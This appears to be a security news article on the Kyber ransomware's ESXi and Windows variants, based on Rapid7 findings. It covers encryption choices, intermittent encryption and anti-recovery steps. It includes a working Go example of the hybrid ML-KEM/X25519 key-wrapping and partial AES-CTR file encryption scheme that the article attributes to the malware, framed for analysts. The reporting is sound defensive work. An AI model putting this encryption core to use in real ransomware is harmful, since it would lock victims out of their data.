Kyber Ransomware Targets Windows and VMware ESXi with Post-Quantum Claims
A new **Kyber** ransomware operation has emerged, targeting both Windows and VMware ESXi systems. The operation claims to implement Kyber1024 post-quantum encryption, but analysis shows that only one of its two variants actually does so.

**Rapid7** researchers analyzed two distinct **Kyber** variants in March 2026 during an incident response. Both variants were deployed on the same network, with one specifically targeting VMware ESXi environments and the other focusing on Windows file servers.
### ESXi Variant: VMware-Focused Encryption
"The ESXi variant is specifically built for VMware environments, with capabilities for datastore encryption, optional virtual machine termination, and defacement of management interfaces," explains **Rapid7**.
The ESXi variant enumerates all virtual machines (VMs), encrypts datastore files, and defaces the ESXi interfaces with ransom notes to guide victims through the ransom payment and recovery process.

_**Kyber ransomware victim extortion portal**
Source: BleepingComputer.com_
### Post-Quantum Claims and Reality
While the ransomware advertises 'post-quantum' encryption based on the **Kyber1024** key encapsulation mechanism, **Rapid7** found that this claim does not hold for the Linux ESXi encryptor. The Linux version uses ChaCha8 for file encryption and conventional RSA-4096 to wrap the file keys.
Encrypted files receive the '.xhsyw' extension. Files smaller than 1 MB are encrypted in full, while larger files undergo partial (intermittent) encryption, with the encrypted proportion determined by file size and operator configuration.

_**Ransom note embedded in the ELF binary**
Source: Rapid7_
### Windows Variant: Rust-Based and Potentially More Sophisticated
The Windows variant, written in Rust, implements **Kyber1024** alongside X25519 in a hybrid scheme for key protection, which matches the ransom note's claims.
"This confirms that **Kyber** is not used for direct file encryption. Instead, **Kyber1024** protects the symmetric key material, while AES-CTR handles bulk data encryption," **Rapid7** explains.
Regardless of whether RSA or **Kyber1024** wraps the file key, files remain unrecoverable without the attacker's private key. The post-quantum label changes nothing for victims today; the key-encapsulation layer only determines which future attacks on the wrapped key material would be feasible, not whether the data can be recovered now.
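The following is an added example, not code from the Kyber ransomware or from Rapid7, of the two design points described above: a KEM (here ML-KEM-1024, the standardized form of Kyber1024) combined with X25519 only ever protects the per-file symmetric key, while a symmetric cipher in CTR mode does the bulk work, and large files are only partially (intermittently) encrypted. The 1 MB full-encryption threshold comes from the ESXi description; the 64 KiB-per-256 KiB stripe policy, the hash-based secret combiner, the envelope layout and the use of AES-CTR rather than ChaCha8 are assumptions made for illustration.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/mlkem"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
	"io"
)

// Assumed policy for this example (only the 1 MB threshold comes from the article):
// files under fullLimit are encrypted in full; larger files get only the first
// `stripe` bytes of every `block` bytes touched, i.e. intermittent encryption.
const (
	fullLimit = 1 << 20   // 1 MiB
	stripe    = 64 << 10  // assumed: 64 KiB encrypted ...
	block     = 256 << 10 // assumed: ... out of every 256 KiB
)

// Envelope is what an encrypted file would carry (layout assumed for this example).
// Only KEMCiphertext and EphemeralPub are needed to rebuild the file key, and both
// require the attacker's private keys, never the victim's.
type Envelope struct {
	KEMCiphertext []byte // ML-KEM-1024 ciphertext; opens only with the attacker's decapsulation key
	EphemeralPub  []byte // per-file ephemeral X25519 public key
	IV            []byte // AES-CTR initial counter block
	Body          []byte // file body, fully or partially encrypted
}

// encryptedRanges lists the [start,end) spans the policy actually encrypts.
func encryptedRanges(n int) [][2]int {
	if n < fullLimit {
		return [][2]int{{0, n}}
	}
	var r [][2]int
	for off := 0; off < n; off += block {
		end := off + stripe
		if end > n {
			end = n
		}
		r = append(r, [2]int{off, end})
	}
	return r
}

// plaintextBytes reports how much of a file the policy leaves untouched, which is
// what an analyst carving intermittently encrypted files wants to know.
func plaintextBytes(n int) int {
	enc := 0
	for _, r := range encryptedRanges(n) {
		enc += r[1] - r[0]
	}
	return n - enc
}

// deriveFileKey combines the KEM and X25519 shared secrets. Hashing the
// concatenation is a simplified combiner used here for illustration only.
func deriveFileKey(kemSS, dhSS []byte) []byte {
	sum := sha256.Sum256(append(append([]byte{}, kemSS...), dhSS...))
	return sum[:]
}

// applyCTR XORs one AES-CTR keystream over the selected ranges in place, in order.
// CTR is an involution, so the same call encrypts and decrypts.
func applyCTR(key, iv, body []byte, ranges [][2]int) error {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return err
	}
	stream := cipher.NewCTR(blk, iv)
	for _, r := range ranges {
		stream.XORKeyStream(body[r[0]:r[1]], body[r[0]:r[1]])
	}
	return nil
}

// Encrypt models the ransomware side: it embeds only the attacker's public
// material (ML-KEM encapsulation key and X25519 public key).
func Encrypt(ek *mlkem.EncapsulationKey1024, attackerPub *ecdh.PublicKey, plaintext []byte) (*Envelope, error) {
	kemSS, kemCT := ek.Encapsulate()
	eph, err := ecdh.X25519().GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	dhSS, err := eph.ECDH(attackerPub)
	if err != nil {
		return nil, err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return nil, err
	}
	body := append([]byte{}, plaintext...)
	if err := applyCTR(deriveFileKey(kemSS, dhSS), iv, body, encryptedRanges(len(body))); err != nil {
		return nil, err
	}
	return &Envelope{KEMCiphertext: kemCT, EphemeralPub: eph.PublicKey().Bytes(), IV: iv, Body: body}, nil
}

// Decrypt models the attacker's decryptor: it needs both private keys to
// rebuild the file key; nothing on the victim's machine can do this.
func Decrypt(dk *mlkem.DecapsulationKey1024, attackerPriv *ecdh.PrivateKey, env *Envelope) ([]byte, error) {
	kemSS, err := dk.Decapsulate(env.KEMCiphertext)
	if err != nil {
		return nil, err
	}
	ephPub, err := ecdh.X25519().NewPublicKey(env.EphemeralPub)
	if err != nil {
		return nil, err
	}
	dhSS, err := attackerPriv.ECDH(ephPub)
	if err != nil {
		return nil, err
	}
	body := append([]byte{}, env.Body...)
	if err := applyCTR(deriveFileKey(kemSS, dhSS), env.IV, body, encryptedRanges(len(body))); err != nil {
		return nil, err
	}
	return body, nil
}

func main() {
	dk, _ := mlkem.GenerateKey1024()
	xpriv, _ := ecdh.X25519().GenerateKey(rand.Reader)
	// constructed sample "document" of about 1.4 MB, so the intermittent policy applies
	doc := bytes.Repeat([]byte("Q3 financials\n"), 100000)
	env, _ := Encrypt(dk.EncapsulationKey(), xpriv.PublicKey(), doc)
	fmt.Printf("%d of %d bytes left in the clear\n", plaintextBytes(len(doc)), len(doc))
	back, _ := Decrypt(dk, xpriv, env)
	fmt.Println("attacker-side round trip ok:", bytes.Equal(back, doc))
}
```

Two things to take from running it: the body of a large file still contains long runs of readable plaintext between stripes, so carving or partial recovery is possible even when the key is not, and a decryptor built from the wrong decapsulation key does not fail, it just produces garbage, because ML-KEM's implicit rejection returns a pseudorandom shared secret rather than an error.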
The Windows variant appends the '.#~~~' extension to encrypted files, terminates services, deletes backups, and includes an experimental feature to shut down Hyper-V virtual machines. It's designed to eliminate data recovery paths by deleting shadow copies, disabling boot repair, killing SQL, Exchange, and backup services, clearing event logs, and wiping the Windows Recycle Bin.

_**Kyber for Windows CLI**
Source: Rapid7_
**Kyber**'s Windows variant also uses an unusual mutex, referencing a song on the Boomplay music platform, according to **Rapid7**. Overall, the Windows variant appears more technically mature than the ESXi variant.
Currently, only one victim is listed on the **Kyber** data extortion portal: a multi-billion-dollar American defense contractor and IT services provider.